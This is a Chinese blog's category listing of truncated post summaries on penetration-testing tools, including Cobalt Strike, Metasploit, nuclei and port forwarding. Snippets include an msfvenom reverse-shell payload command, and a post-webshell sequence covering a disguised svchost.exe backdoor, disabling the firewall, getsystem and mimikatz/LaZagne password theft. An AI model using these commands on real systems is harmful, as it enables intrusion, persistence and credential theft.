随笔分类 - 工具使用
摘要:下载 https://github.com/projectdiscovery/nuclei 下载模板 https://github.com/projectdiscovery/nuclei-templates/releases 开始扫描,将结果保存result文件中 nuclei -l urls.tx
阅读全文
摘要:Eclipse Memory Analyzer下载地址:http://www.eclipse.org/mat/downloads.phpffuf fuzz工具 https://github.com/ffuf/ffufspiderfoot信息收集:https://github.com/smicalle
阅读全文
摘要:前提:已经控制内网的一台主机 一.正向连接 1.设置beacon 监听 2.把后门上传到目标内网主机执行,就会监听4444端口 3.在控制的那台内网主机上执行 connect 10.10.1.6:4444 就可以了 二、反向连接 1.设置监听 2.生成后门反弹到控制的主机就可以了 参考:https:
阅读全文
摘要:netsh 是 windows 系统自带的一个命令行工具,这个工具可以内置中端口转发功能。 将来自333端口的流量全部转发到192.168.191.130的3389端口 netsh interface portproxy add v4tov4 listenport=333 connectaddres
阅读全文
摘要:一、基础介绍 1.beacon命令 BeaconCommands Command Description browserpivot 注入受害者浏览器进程 bypassuac 绕过UAC cancel 取消正在进行的下载 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beaco
阅读全文
摘要:一、系统命令 1.基本命令 sessions -i #进入会话 -k#杀死会话 background #将当前会话放置后台 run #执行已有模块 getuid #查看权限 getpid #查看当前进程的pid sysinfo #查看系统信息 ps #查看当前活跃进程n shell #进入目标cmd
阅读全文
摘要:上传了webshell之后 1.上传免杀后门,起一个名字为svchost.exe 的木马 2.netsh advfirewall set allprofiles state off 关闭防火墙 3.提权 msf getsystem 4.minikazt 抓取密码 5.收集密码⼯具-LaZagne.e
阅读全文
摘要:poc和各种工具集合,可以在里面搜索payload,工具,免杀,代理 https://github.com/Mr-xn/Penetration_Testing_POC 各种shell 生成 https://web.archive.org/web/20200806075428/https://krob
阅读全文
摘要:安装 参考官网文档:https://docs.docker.com/ 中午社区:https://www.docker.org.cn/卸载之前的docker1.$ sudo apt-get remove docker docker-engine docker.io containerd runc$ s
阅读全文
摘要:portmap liunx上:执行:./portmap -m 2 -p1 7003 -h2 127.0.0.1 -p2 7004意思就是监听来自7003端口的请求,将其转发到7004端口。 还有一个问题就是执行portmap命令时会提醒没有权限,这是就要给portmap加上权限chmod 777 p
阅读全文
摘要:下载脚本:https://github.com/rsmudge/ElevateKit 查看提权脚本: 现在提权的方法少得可怜,只有两种: 我们下面开始加载脚本 打开cs脚本管理: 加载脚本 加载后这么多了: 内网探针: net computers //内网探针 net view //探针内网网络架构
阅读全文
摘要:Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w
阅读全文
摘要:CobaltStrike-机器上线微信提醒 这两天看cs看的头大 原文地址:http://www.nmd5.com/?p=567 Server酱申请账号 我们先申请一个Server酱的账号,使用Github账号即可登录,地址: http://sc.ftqq.com/ 申请SCKEY 登录之后,如下:
阅读全文
摘要:Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java 11,或OpenJDK 11。 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件。
阅读全文

浙公网安备 33010602011771号